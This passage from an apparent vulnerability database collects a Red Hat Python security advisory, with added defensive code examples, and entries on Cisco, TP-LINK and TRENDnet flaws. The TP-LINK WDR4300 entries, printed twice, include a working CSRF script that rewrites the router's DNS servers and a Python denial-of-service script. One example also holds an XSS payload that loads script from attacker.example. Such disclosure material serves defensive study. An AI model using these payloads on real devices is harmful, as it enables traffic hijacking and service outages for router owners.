negative value that is used as an array index, causing the scanstring
function to access process memory outside of the string it is intended
to access (CVE-2014-4616).
The CGIHTTPServer Python module does not properly handle URL-encoded
path separators in URLs (CVE-2014-4650).
Python before 2.7.8 is vulnerable to an integer overflow in the buffer
type (CVE-2014-7185).
It was possible to configure a trust root to be checked against,
however there were no facilities for hostname checking (CVE-2014-9365).
The python-pip and tix packages were added due to missing build
dependencies. The verification of md5 checksums and GPG signatures is
performed automatically for you.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Moderate: python security, bug fix, and enhancement update
Advisory ID: RHSA-2015:2101-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2101.html
Issue date: 2015-11-19
CVE Names: CVE-2013-1752 CVE-2013-1753 CVE-2014-4616
CVE-2014-4650 CVE-2014-7185
=====================================================================
1. Summary:
Updated python packages that fix multiple security issues, several bugs,
and add various enhancements are now available for Red Hat Enterprise
Linux 7.
Red Hat Product Security has rated this update as having Moderate security
impact. Common Vulnerability Scoring System (CVSS) base scores, which give
detailed severity ratings, are available for each vulnerability from the
CVE links in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
Python is an interpreted, interactive, object-oriented programming language
often compared to Tcl, Perl, Scheme, or Java. Python includes modules,
classes, exceptions, very high level dynamic data types and dynamic typing.
Python supports interfaces to many system calls and libraries, as well as
to various windowing systems (X11, Motif, Tk, Mac and MFC).
It was discovered that the Python xmlrpclib module did not restrict the
size of gzip-compressed HTTP responses. A malicious XMLRPC server could
cause an XMLRPC client using xmlrpclib to consume an excessive amount of
memory. (CVE-2013-1753)
It was discovered that multiple Python standard library modules
implementing network protocols (such as httplib or smtplib) failed to
restrict the sizes of server responses. A malicious server could cause a
client using one of the affected modules to consume an excessive amount of
memory. (CVE-2013-1752)
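The two flaws above are the same class of bug: the client lets the remote peer decide how much memory it allocates, once per unterminated line and once per compressed body. The following is an added example (not code from the Red Hat advisory or from the Python standard library) that contrasts an unbounded readline() with a bounded one and shows a capped gzip decode of the kind xmlrpclib gained; the hostile response and the gzip bomb are constructed inline, and the 65536-byte line limit and 20 MiB decode cap mirror the values the upstream fixes used.

```python
import gzip
import io

# Bound on one protocol line; the same figure the Python fix used (_MAXLINE = 65536).
MAX_LINE = 65536
# Bound on a decompressed XML-RPC payload; the fix defaulted max_decode to 20 MiB.
MAX_DECODE = 20 * 1024 * 1024


class LineTooLong(Exception):
    """Raised when a peer sends a line longer than the caller is willing to buffer."""


def read_line_unbounded(stream):
    # Pre-fix behaviour: readline() with no limit keeps buffering until it sees
    # "\n", so the peer decides how much memory the client allocates.
    return stream.readline()


def read_line_bounded(stream, limit=MAX_LINE):
    # Post-fix behaviour: request at most limit+1 bytes and refuse the line if it
    # did not terminate within the limit, instead of buffering it in full.
    line = stream.readline(limit + 1)
    if len(line) > limit:
        raise LineTooLong("line exceeds %d bytes" % limit)
    return line


def parse_response_head(raw, reader):
    """Read a status line and the header lines from raw bytes with the given
    line reader. Returns (status_line, [header_line, ...]) without CR/LF."""
    stream = io.BytesIO(raw)
    status = reader(stream).rstrip(b"\r\n")
    headers = []
    while True:
        line = reader(stream)
        if line in (b"", b"\r\n", b"\n"):
            break
        headers.append(line.rstrip(b"\r\n"))
    return status, headers


def malicious_response(header_len):
    # Constructed sample of a hostile server: one header value far longer than
    # any legitimate HTTP header, with no line terminator until the very end.
    return b"HTTP/1.1 200 OK\r\nX-Pad: " + b"A" * header_len + b"\r\n\r\n"


def gzip_bomb_sample(size):
    # Constructed sample: `size` zero bytes compress to a few kilobytes at most.
    return gzip.compress(b"\x00" * size)


def gzip_decode_capped(data, max_decode=MAX_DECODE):
    # Decompress incrementally and stop one byte past the cap, so a small gzip
    # bomb cannot make the client allocate more than max_decode bytes.
    with gzip.GzipFile(mode="rb", fileobj=io.BytesIO(data)) as f:
        out = f.read(max_decode + 1)
    if len(out) > max_decode:
        raise ValueError("decompressed payload exceeds %d bytes" % max_decode)
    return out


if __name__ == "__main__":
    raw = malicious_response(200000)
    status, hdrs = parse_response_head(raw, read_line_unbounded)
    print("unbounded reader buffered a %d-byte header" % len(hdrs[0]))
    try:
        parse_response_head(raw, read_line_bounded)
    except LineTooLong as e:
        print("bounded reader rejected it:", e)
    try:
        gzip_decode_capped(gzip_bomb_sample(4 * 1024 * 1024), max_decode=1024 * 1024)
    except ValueError as e:
        print("capped decoder rejected the bomb:", e)
```

The same pattern applies to any protocol client that reads until a delimiter: pass a limit to readline(), treat an over-long line as a protocol error, and cap decompression output by reading one byte past the cap rather than calling read() with no size.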
It was discovered that the CGIHTTPServer module incorrectly handled URL
encoded paths. A remote attacker could use this flaw to execute scripts
outside of the cgi-bin directory, or disclose the source code of the
scripts in the cgi-bin directory. (CVE-2014-4650)
An integer overflow flaw was found in the way the buffer() function handled
its offset and size arguments. An attacker able to control these arguments
could use this flaw to disclose portions of the application memory or cause
it to crash. (CVE-2014-7185)
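To see why a percent-encoded path separator matters for the CGIHTTPServer flaw, here is an added example (not Python's own http.server code, though it is modelled on its _url_collapse_path and is_cgi logic) that classifies two constructed request paths with and without decoding before the split. The document root /srv/www and the script names are made up for the illustration; the two request paths show the source-disclosure and the execute-outside-cgi-bin vectors the advisory describes.

```python
import posixpath
from urllib.parse import unquote

CGI_DIRECTORIES = ["/cgi-bin", "/htbin"]


def collapse_path(path, decode_first):
    """Collapse '.', '..' and empty components of a URL path, modelled on
    http.server._url_collapse_path. With decode_first=False (the pre-fix
    behaviour) a percent-encoded slash is an opaque character and never splits
    a component; with decode_first=True it is decoded before the split.
    Raises ValueError if '..' tries to climb above the root."""
    path, _, query = path.partition("?")
    if decode_first:
        path = unquote(path)
    parts = path.split("/")
    head = []
    for part in parts[:-1]:
        if part == "..":
            if not head:
                raise ValueError("path escapes the document root")
            head.pop()
        elif part and part != ".":
            head.append(part)
    tail = parts[-1]
    if tail == "..":
        if not head:
            raise ValueError("path escapes the document root")
        head.pop()
        tail = ""
    elif tail == ".":
        tail = ""
    if query:
        tail = tail + "?" + query
    return "/" + "/".join(head), tail


def classify(path, decode_first):
    """Decide, as CGIHTTPRequestHandler.is_cgi does, whether a request is
    dispatched to a CGI script or served as a static file."""
    head, tail = collapse_path(path, decode_first)
    kind = "cgi" if head in CGI_DIRECTORIES else "static"
    return kind, head, tail


def resolve_script(docroot, head, tail):
    """Where the request ends up on disk: the pieces are joined and only then
    unquoted, so an encoded '..' left in `tail` is honoured as traversal."""
    joined = head.rstrip("/") + "/" + tail.partition("?")[0]
    return docroot.rstrip("/") + posixpath.normpath(unquote(joined))


if __name__ == "__main__":
    # Constructed request paths: the disclosure vector and the traversal vector.
    for req in ("/cgi-bin%2ftest.py", "/cgi-bin/..%2f..%2fetc%2fscript.py"):
        for decode in (False, True):
            try:
                kind, head, tail = classify(req, decode)
                where = resolve_script("/srv/www", head, tail)
                print("%-38s decode_first=%-5s -> %-6s %s" % (req, decode, kind, where))
            except ValueError as e:
                print("%-38s decode_first=%-5s -> rejected (%s)" % (req, decode, e))
```

Without decoding first, /cgi-bin%2ftest.py collapses to head "/" and is served as a static file, which is the script's source; /cgi-bin/..%2f..%2fetc%2fscript.py keeps head "/cgi-bin", passes the CGI check, and is then resolved to /srv/www/etc/script.py and executed. Decoding before the split classifies the first as a CGI request and rejects the second outright.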
A flaw was found in the way the json module handled negative index
arguments passed to certain functions (such as raw_decode()). An attacker
able to control the index value passed to one of the affected functions
could possibly use this flaw to disclose portions of the application
memory. (CVE-2014-4616)
The Python standard library HTTP client modules (such as httplib or urllib)
did not perform verification of TLS/SSL certificates when connecting to
HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack
connections and eavesdrop or modify transferred data. (CVE-2014-9365)
Note: The Python standard library was updated to make it possible to enable
certificate verification by default. However, for backwards compatibility,
verification remains disabled by default. Future updates may change this
default. Refer to the Knowledgebase article 2039753 linked to in the
References section for further details about this change. (BZ#1219108)
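For the certificate-verification issue the practical question is how to tell whether a given client context actually validates anything, since verification stayed off by default in this update. The following added example (not from the advisory or the Python standard library) builds a context with the pre-PEP-476 behaviour beside a verifying one and runs a small audit over each; the audit thresholds (CERT_REQUIRED, hostname checking, TLS 1.2 minimum) are this example's own choices, and example.com is only used to construct a connection object that is never opened.

```python
import http.client
import ssl


def legacy_context():
    """A context with the pre-PEP-476 behaviour: the handshake completes
    against any certificate and the name in it is never compared to the host."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False        # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def verifying_context(cafile=None):
    """What an HTTPS client should use: chain validation against the platform
    trust store (or the given CA bundle), hostname matching, TLS 1.2 or newer."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx):
    """Return a list of findings for settings that leave a client context open
    to an active network attacker; an empty list means none were found."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("verify_mode is not CERT_REQUIRED: the server certificate "
                        "chain is never validated")
    if not ctx.check_hostname:
        findings.append("check_hostname is False: a valid certificate for any "
                        "other name is accepted")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("minimum_version permits TLS older than 1.2")
    return findings


def https_connection(host, ctx, port=443):
    """Build (but do not open) an HTTPS connection bound to ctx; the context,
    not the host name, decides whether anything is verified."""
    return http.client.HTTPSConnection(host, port, context=ctx)


if __name__ == "__main__":
    for name, ctx in (("legacy", legacy_context()), ("verifying", verifying_context())):
        print(name + ":", audit_context(ctx) or ["no findings"])
    conn = https_connection("example.com", verifying_context())   # not opened here
    print("connection object ready:", type(conn).__name__)
```

In a code review, grep for verify_mode = CERT_NONE and check_hostname = False and run the audit over any context that is built by hand; a context that fails the first two checks gives a man-in-the-middle exactly the position the advisory describes.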
This update also fixes the following bugs:
* Subprocesses used with the Eventlet library or regular threads previously
tried to close epoll file descriptors twice, which led to an "Invalid
argument" error. Subprocesses have been fixed to close the file descriptors
only once. (BZ#1103452)
* When importing the readline module from a Python script, Python no longer
produces erroneous random characters on stdout. (BZ#1189301)
* The cProfile utility has been fixed to print all values that the "-s"
option supports when this option is used without a correct value.
(BZ#1237107)
* The load_cert_chain() function now accepts "None" as a keyfile argument.
(BZ#1250611)
In addition, this update adds the following enhancements:
* Security enhancements as described in PEP 466 have been backported to the
Python standard library, for example, new features of the ssl module:
Server Name Indication (SNI) support, support for new TLSv1.x protocols,
new hash algorithms in the hashlib module, and many more. (BZ#1111461)
* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl
library. (BZ#1192015)
* The ssl.SSLSocket.version() method is now available to access information
about the version of the SSL protocol used in a connection. (BZ#1259421)
All python users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues and add these
enhancements.
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1046170 - CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip encoding
1046174 - CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
1058482 - tmpwatch removes python multiprocessing sockets
1112285 - CVE-2014-4616 python: missing boundary check in JSON module
1113527 - CVE-2014-4650 python: CGIHTTPServer module does not properly handle URL-encoded path separators in URLs
1146026 - CVE-2014-7185 python: buffer() integer overflow leading to out of bounds read
1173041 - CVE-2014-9365 python: failure to validate certificates in the HTTP client with TLS (PEP 476)
1177613 - setup.py bdist_rpm NameError: global name 'get_python_version' is not defined
1181624 - multiprocessing BaseManager serve_client() does not check EINTR on recv
1237107 - cProfile main() traceback if options syntax is invalid
1250611 - SSLContext.load_cert_chain() keyfile argument can't be set to None
1259421 - Backport SSLSocket.version() to python 2.7.5
6. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
aarch64:
python-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-devel-2.7.5-34.el7.aarch64.rpm
python-libs-2.7.5-34.el7.aarch64.rpm
ppc64:
python-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-devel-2.7.5-34.el7.ppc64.rpm
python-libs-2.7.5-34.el7.ppc.rpm
python-libs-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-devel-2.7.5-34.el7.ppc64le.rpm
python-libs-2.7.5-34.el7.ppc64le.rpm
s390x:
python-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-devel-2.7.5-34.el7.s390x.rpm
python-libs-2.7.5-34.el7.s390.rpm
python-libs-2.7.5-34.el7.s390x.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64:
python-debug-2.7.5-34.el7.aarch64.rpm
python-debuginfo-2.7.5-34.el7.aarch64.rpm
python-test-2.7.5-34.el7.aarch64.rpm
python-tools-2.7.5-34.el7.aarch64.rpm
tkinter-2.7.5-34.el7.aarch64.rpm
ppc64:
python-debug-2.7.5-34.el7.ppc64.rpm
python-debuginfo-2.7.5-34.el7.ppc64.rpm
python-test-2.7.5-34.el7.ppc64.rpm
python-tools-2.7.5-34.el7.ppc64.rpm
tkinter-2.7.5-34.el7.ppc64.rpm
ppc64le:
python-debug-2.7.5-34.el7.ppc64le.rpm
python-debuginfo-2.7.5-34.el7.ppc64le.rpm
python-test-2.7.5-34.el7.ppc64le.rpm
python-tools-2.7.5-34.el7.ppc64le.rpm
tkinter-2.7.5-34.el7.ppc64le.rpm
s390x:
python-debug-2.7.5-34.el7.s390x.rpm
python-debuginfo-2.7.5-34.el7.s390x.rpm
python-test-2.7.5-34.el7.s390x.rpm
python-tools-2.7.5-34.el7.s390x.rpm
tkinter-2.7.5-34.el7.s390x.rpm
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
python-2.7.5-34.el7.src.rpm
x86_64:
python-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.i686.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-devel-2.7.5-34.el7.x86_64.rpm
python-libs-2.7.5-34.el7.i686.rpm
python-libs-2.7.5-34.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
python-debug-2.7.5-34.el7.x86_64.rpm
python-debuginfo-2.7.5-34.el7.x86_64.rpm
python-test-2.7.5-34.el7.x86_64.rpm
python-tools-2.7.5-34.el7.x86_64.rpm
tkinter-2.7.5-34.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2013-1752
https://access.redhat.com/security/cve/CVE-2013-1753
https://access.redhat.com/security/cve/CVE-2014-4616
https://access.redhat.com/security/cve/CVE-2014-4650
https://access.redhat.com/security/cve/CVE-2014-7185
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/articles/2039753
https://www.python.org/dev/peps/pep-0466/
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFWTj/SXlSAg2UNWIIRAuXcAKCCJdw1P4H3y4fnhu6lXW2AcADYJgCfRO+v
qMX3qLAXBobeDiPX4eN9Pxc=
=JQMw
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
| VAR-201409-0403 | CVE-2014-3380 | Cisco Unified Communications Domain Manager Platform Software denial of service (DoS) vulnerability |
| CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Unified Communications Domain Manager Platform Software 4.4(.3) and earlier allows remote attackers to cause a denial of service (CPU consumption) by sending crafted TCP packets quickly, aka Bug ID CSCuo42063.
A remote attacker may exploit this issue to trigger a denial-of-service condition due to excessive CPU utilization.
This issue is being tracked by Cisco Bug ID CSCuo42063. This component features scalable, distributed, and highly available enterprise Voice over IP call processing.
| VAR-201409-0078 | CVE-2014-4728 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware web server denial of service (DoS) vulnerability |
| CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The web server in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to cause a denial of service (crash) via a long header in a GET request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 is prone to a denial-of-service vulnerability and to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to cause denial-of-service conditions or to execute attacker-supplied HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Versions Affected: 130617, possibly earlier
CVE Numbers Assigned: CVE-2014-4727, CVE-2014-4728
Vulnerabilities Description
===================
# Stored XSS -
It is possible to inject JavaScript code via the DHCP hostname field: a client on the LAN sends a DHCP request carrying the payload as its host name, and when the administrator visits the DHCP clients page in the web panel the script executes in the administrator's browser.
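The DHCP client list is a textbook case of untrusted LAN-side input reaching an authenticated admin page. The following is an added example (not part of the advisory or of TP-LINK's firmware) showing in Python what the vulnerable rendering pattern looks like beside a hardened one that validates the learned host name against RFC 1123 label rules and HTML-escapes it on output; the payload, the MAC and IP addresses and the attacker.example host are constructed for the illustration.

```python
import html
import re

# One RFC 1123 host-name label: letters, digits and hyphens, no leading or
# trailing hyphen, 1-63 characters.
_LABEL = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")

# Constructed payload; attacker.example is a made-up host.
PAYLOAD = '<script src="http://attacker.example/x.js"></script>'


def build_option12(hostname):
    """Encode a host name as DHCP option 12 (code, length, bytes). The option
    carries at most 255 bytes and nothing on the wire stops them being HTML."""
    data = hostname.encode("utf-8")
    if len(data) > 255:
        raise ValueError("host name option is limited to 255 bytes")
    return bytes([12, len(data)]) + data


def is_valid_hostname(name):
    """RFC 1123 host name: dot-separated labels, 255 characters overall."""
    if not name or len(name) > 255:
        return False
    return all(_LABEL.match(label) for label in name.split("."))


def render_client_row_vulnerable(mac, ip, hostname):
    # Pre-fix pattern: the learned host name is concatenated straight into the
    # DHCP clients page, so the admin's browser runs whatever the client sent.
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (mac, ip, hostname)


def render_client_row_fixed(mac, ip, hostname):
    # Post-fix pattern: reject anything that is not a host name, and escape on
    # output anyway so a future validation gap still cannot inject markup.
    shown = hostname if is_valid_hostname(hostname) else "(invalid host name)"
    return "<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (
        html.escape(mac, quote=True), html.escape(ip, quote=True),
        html.escape(shown, quote=True))


if __name__ == "__main__":
    mac, ip = "00:11:22:33:44:55", "192.168.0.100"   # constructed client
    print("option 12 on the wire:", build_option12(PAYLOAD))
    print("vulnerable:", render_client_row_vulnerable(mac, ip, PAYLOAD))
    print("fixed:     ", render_client_row_fixed(mac, ip, PAYLOAD))
    print("fixed, benign:", render_client_row_fixed(mac, ip, "laptop-01.lan"))
```

Validation alone is not enough because the page is an HTML context and other DHCP-learned fields (vendor class, client ID) reach it too; escaping at the point of output is what actually closes the hole, and the host-name check only keeps the list readable.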
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC (Python 2: httplib module, print statement)
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
# Extra request header with a long value ("A" x 3000 times, as described above)
headers = {"Content-type": "application/x-www-form-urlencoded",
           "Accept": "text/plain", "DoS": "A" * 3000}
conn.request("GET", "/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2014-09-16:
Vendor released a fix.
Credits:
======
The vulnerabilities were discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0077 | CVE-2014-4727 | TP-LINK N750 Wireless Dual Band Gigabit Router firmware cross-site scripting vulnerability in DHCP clients page |
| CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the DHCP clients page in the TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) with firmware before 140916 allows remote attackers to inject arbitrary web script or HTML via the hostname in a DHCP request. TP-Link is a well-known supplier of network and communication equipment. The TP-LINK WDR4300 has an HTML-injection vulnerability because it does not adequately filter user-supplied input. An attacker may exploit this vulnerability to execute arbitrary HTML or script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TP-LINK WDR4300 running firmware version 130617 is vulnerable; other versions may also be affected. TP-LINK N750 Wireless Dual Band Gigabit Router (TL-WDR4300) is a wireless dual-band Gigabit router product of China Pulian (TP-LINK) company.
Advisory Information
===============
Vendors Contacted: TP-LINK
Vendor Patched: Yes, Firmware 140916
System Affected: N750 Wireless Dual Band Gigabit Router (TL-WDR4300), might affect others.
# DoS (web server) -
A denial of service condition in the device's web server: send the device, remotely or locally, a GET request carrying an extra header whose value is about 3000 characters long ("A" x 3000 times). The web server crashes.
Proof of Concept:
============
http://elisyan.com/tplink/wdr4300.html
---- start wdr4300.html ----
/*
Author: Oz Elisyan
Title: TP-LINK WDR4300 XSS to CSRF (the device has Referer check)
*/
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{
document.getElementById("myDiv").innerHTML=xmlhttp.responseText;
}
}
xmlhttp.open("GET","/userRpm/WanDynamicIpCfgRpm.htm?wan=0&mtu=1500&manual=2&dnsserver=X.X.X.X&dnsserver2=X.X.X.X&hostName=&Save=Save",true);
xmlhttp.send();
---- end wdr4300.html ----
http://elisyan.com/tplink/wdr4300.py
---- start wdr4300.py ----
#Author: Oz Elisyan
#TP-Link WDR4300 DoS PoC (Python 2: httplib module, print statement)
import httplib
conn = httplib.HTTPConnection("192.168.0.1")
# Extra request header with a long value ("A" x 3000 times, as described above)
headers = {"Content-type": "application/x-www-form-urlencoded",
           "Accept": "text/plain", "DoS": "A" * 3000}
conn.request("GET", "/", "Let me tell you something", headers)
print "Done"
---- end wdr4300.py ----
Report Timeline:
===========
2014-07-04:
Vendor notified about the vulnerabilities with all the relevant technical information.
2014-09-16:
Vendor released a fix.
Credits:
======
The vulnerabilities were discovered by Oz Elisyan.
References:
========
http://www.tp-link.com/lk/products/details/?model=TL-WDR4300
| VAR-201409-0394 | CVE-2014-3367 | Cisco Nexus 1000V InterCloud for VMware vCloud Director component cross-site scripting vulnerability |
| CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Cross-site scripting (XSS) vulnerability in the vCloud Director component in Cisco Nexus 1000V InterCloud for VMware allows remote attackers to inject arbitrary web script or HTML via an unspecified value, aka Bug ID CSCuq90524. Cisco Nexus 1000V InterCloud for VMware is virtual switch software from Cisco Systems that provides Cisco Catalyst switch features such as QoS, ACLs, and SPAN in a VMware virtualized environment. vCloud Director is one of VMware's virtual cloud infrastructure components. The software does not adequately filter user-submitted input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
This issue is being tracked by Cisco Bug ID CSCuq90524.
| VAR-201409-1258 | No CVE | TRENDnet TEW-818DRU unspecified vulnerability |
| CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
TRENDnet TEW-818DRU is a routing device. An unspecified vulnerability exists in the TRENDnet TEW-818DRU; no further details are available.
| VAR-201409-0395 | CVE-2014-3376 | Cisco IOS XR denial of service (DoS) vulnerability |
| CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed RSVP packet, aka Bug ID CSCuq12031. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCuq12031.
| VAR-201409-0400 | CVE-2014-3377 | Cisco IOS XR snmpd denial of service (DoS) vulnerability |
| CVSS V2: 4.0 CVSS V3: - Severity: MEDIUM |
snmpd in Cisco IOS XR 5.1 and earlier allows remote authenticated users to cause a denial of service (process reload) via a malformed SNMPv2 packet, aka Bug ID CSCun67791. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
This issue is being tracked by Cisco Bug ID CSCun67791.
| VAR-201409-0401 | CVE-2014-3378 | Cisco IOS XR tacacsd denial of service (DoS) vulnerability |
| CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
tacacsd in Cisco IOS XR 5.1 and earlier allows remote attackers to cause a denial of service (process reload) via a malformed TACACS+ packet, aka Bug ID CSCum00468. Cisco IOS XR is a fully modular, distributed network operating system from Cisco's IOS software family.
Attackers can exploit this issue to cause the TACACS+ process on the affected device to reload, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCum00468.
| VAR-201409-0402 | CVE-2014-3379 | Cisco IOS XR denial of service vulnerability |
| CVSS V2: 6.1 CVSS V3: - Severity: MEDIUM |
Cisco IOS XR 5.1 and earlier on Network Convergence System 6000 devices allows remote attackers to cause a denial of service (NPU and card hang or reload) via a malformed MPLS packet, aka Bug ID CSCuq10466. Cisco IOS is the internetwork operating system used on most Cisco routers and network switches.
This issue is being tracked by Cisco Bug ID CSCuq10466.
| VAR-201409-0722 | CVE-2014-5411 | Schneider Electric ClearSCADA cross-site scripting vulnerability |
